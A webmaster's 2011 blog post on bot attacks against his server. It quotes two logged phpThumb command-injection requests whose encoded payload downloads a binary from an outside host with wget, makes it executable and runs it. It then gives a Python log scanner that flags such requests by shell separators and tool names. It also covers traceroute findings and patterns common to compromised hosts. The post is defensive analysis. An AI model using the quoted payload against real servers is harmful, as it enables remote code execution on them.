Rise of the Machine. A week of wetware against bots...

Submitted by AlReaud on Fri, 12/23/2011 - 10:12

Note: Updated 11/13/2016

A very interesting week in the wetware vs. botware wars. Patterns and common vulnerabilities are starting to come out of obscurity. New attack vectors have presented themselves. Indeed exciting times, LOL.

One of the most interesting, attack-wise, comes from France and Malaysia. It appears to be a CMS scan, but I don't believe it is. It may be one of the first denial of service reflection attacks. There are embedded bash shell commands in the query string that are directed at specific sites that aren't my IP. I've included two samples below:

161.139.195.191 - - [23/Dec/2011:02:53:21 -0700] "GET /wp-content/plugins/com-resize/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/barbut6%20bingoooo.co.uk/barbut6;chmod%200755%20/tmp/barbut6;/tmp/barbut6;ps%20-aux;%20&phpThumbDebug=9 HTTP/1.1" 404 3602

161.139.195.191 - - [23/Dec/2011:02:53:19 -0700] "GET /admin/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/barbut6%20bingoooo.co.uk/barbut6;chmod%200755%20/tmp/barbut6;/tmp/barbut6;ps%20-aux;%20&phpThumbDebug=9 HTTP/1.1" 403 14168

Don't waste your time, folks: I penetration-test my own systems regularly for weaknesses, and the proxy service is turned off. Drupal is also very well protected, BTW. Your rewards for going there are 403s and backtracking… So that's one of the new vectors.
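The two requests above are a textbook command-injection attempt against the phpThumb fltr[] parameter: once percent-decoded, the filter value carries ';'-separated shell commands that list /tmp, fetch a file with wget, chmod it and run it. As an added example (not code from this post, nor from phpThumb, WordPress or Drupal), here is a small Python detector that parses Apache access-log lines, decodes every query parameter and flags values containing shell separators or download/execution helpers. The two attacker lines in the sample are copied from the post; the third line is constructed as a benign phpThumb request, to show that phpThumb's own '|' argument separator (as in blur|9) is not flagged by itself. The indicator regexes are my assumptions about what a filter string should never contain, not phpThumb's or the author's.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Sample Apache access-log text. The first two lines are the requests quoted in the post;
# the third is a CONSTRUCTED benign phpThumb request with a legitimate "blur|9" filter.
SAMPLE_LOG = '''161.139.195.191 - - [23/Dec/2011:02:53:21 -0700] "GET /wp-content/plugins/com-resize/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/barbut6%20bingoooo.co.uk/barbut6;chmod%200755%20/tmp/barbut6;/tmp/barbut6;ps%20-aux;%20&phpThumbDebug=9 HTTP/1.1" 404 3602
161.139.195.191 - - [23/Dec/2011:02:53:19 -0700] "GET /admin/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/barbut6%20bingoooo.co.uk/barbut6;chmod%200755%20/tmp/barbut6;/tmp/barbut6;ps%20-aux;%20&phpThumbDebug=9 HTTP/1.1" 403 14168
192.0.2.7 - - [23/Dec/2011:03:05:44 -0700] "GET /wp-content/plugins/com-resize/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 HTTP/1.1" 200 5120'''

# Common-log prefix: client IP, ident, user, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/[\d.]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Shell command separators a phpThumb filter string has no legitimate reason to contain.
# A lone "|" is deliberately NOT included: phpThumb uses it to separate filter arguments.
SEPARATOR_RE = re.compile(r';|&&|\|\||`|\$\(')
# Download, permission and interpreter helpers typically chained after a separator (assumed list).
TOOL_RE = re.compile(r'\b(wget|curl|chmod|bash|perl|nc)\b')


def parse_line(line):
    """Split one access-log line into its fields, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def query_params(target):
    """Decode the query string of a request target into (name, value) pairs.

    Splitting is done by hand on '&' only: urllib.parse.parse_qs also treated ';' as a
    separator on older Pythons, which would silently split away the ';' we look for.
    """
    pairs = []
    for part in urlsplit(target).query.split('&'):
        if not part:
            continue
        name, _, value = part.partition('=')
        pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def injection_indicators(value):
    """Return the shell-injection indicators present in one decoded parameter value."""
    indicators = []
    seps = SEPARATOR_RE.findall(value)
    if seps:
        indicators.append('separators:' + ','.join(sorted(set(seps))))
    tools = TOOL_RE.findall(value)
    if tools:
        indicators.append('tools:' + ','.join(sorted(set(tools))))
    return indicators


def analyze_log(text):
    """Scan access-log text and report requests whose query values look like shell injection."""
    findings = []
    for raw in text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue  # not a recognisable log line; skip rather than crash
        for name, value in query_params(rec['target']):
            indicators = injection_indicators(value)
            if indicators:
                findings.append({
                    'ip': rec['ip'],
                    'status': int(rec['status']),
                    'path': urlsplit(rec['target']).path,
                    'param': name,
                    'indicators': indicators,
                })
    return findings


if __name__ == '__main__':
    for f in analyze_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['status']} {f['path']} param={f['param']} {' '.join(f['indicators'])}")
```

Both attacker lines are reported (the 404 and the 403 alike: the server refusing the request is no reason to stop counting the attempt), while the constructed benign request is not. Feeding a real access log through analyze_log gives a quick triage list; the indicator lists are the place to tune if a particular application legitimately accepts characters this heuristic treats as separators.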

The other interesting proposition was getting these from two countries going in opposite directions. Tracerouting to 161.139.195.191 actually terminated at 161.139.144.4, but now terminates at:
$ traceroute 161.139.195.191
18  ge-0-0-0.glsfb02.ipe.time.net.my (211.25.27.42)

When this was scanned with Zenmap, observe where the traceroute terminates.

Reduced size zenmap of attacker IP.

It's one of the strangest maps I have had the displeasure to view. Again, this week was a virtual tour of the world, LOL! I contacted a hospital in China, because I don't want to be disabling hospital systems because of compromised security at their end.

Common patterns:

  • HTTP TRACE enabled.
  • All or almost all mail ports open (POP, IMAP, etc.)
  • Undefined ports open.
  • Many mail servers with nothing but a control panel login.
  • Most importantly: Almost 100% LINUX SYSTEMS. This is concerning because it means, IMHO, that the configuration has become too complex for most users to securely configure. The 'nix systems can be the most secure when open to the Internet, but if I'm finding this datum, that means that most compromised systems have been mis-configured allowing bot intrusion.

I have the zenmaps, and redacted secure and httpd logs available for research purposes if anybody is interested. Just contact me at alreaud@happycattech.com.
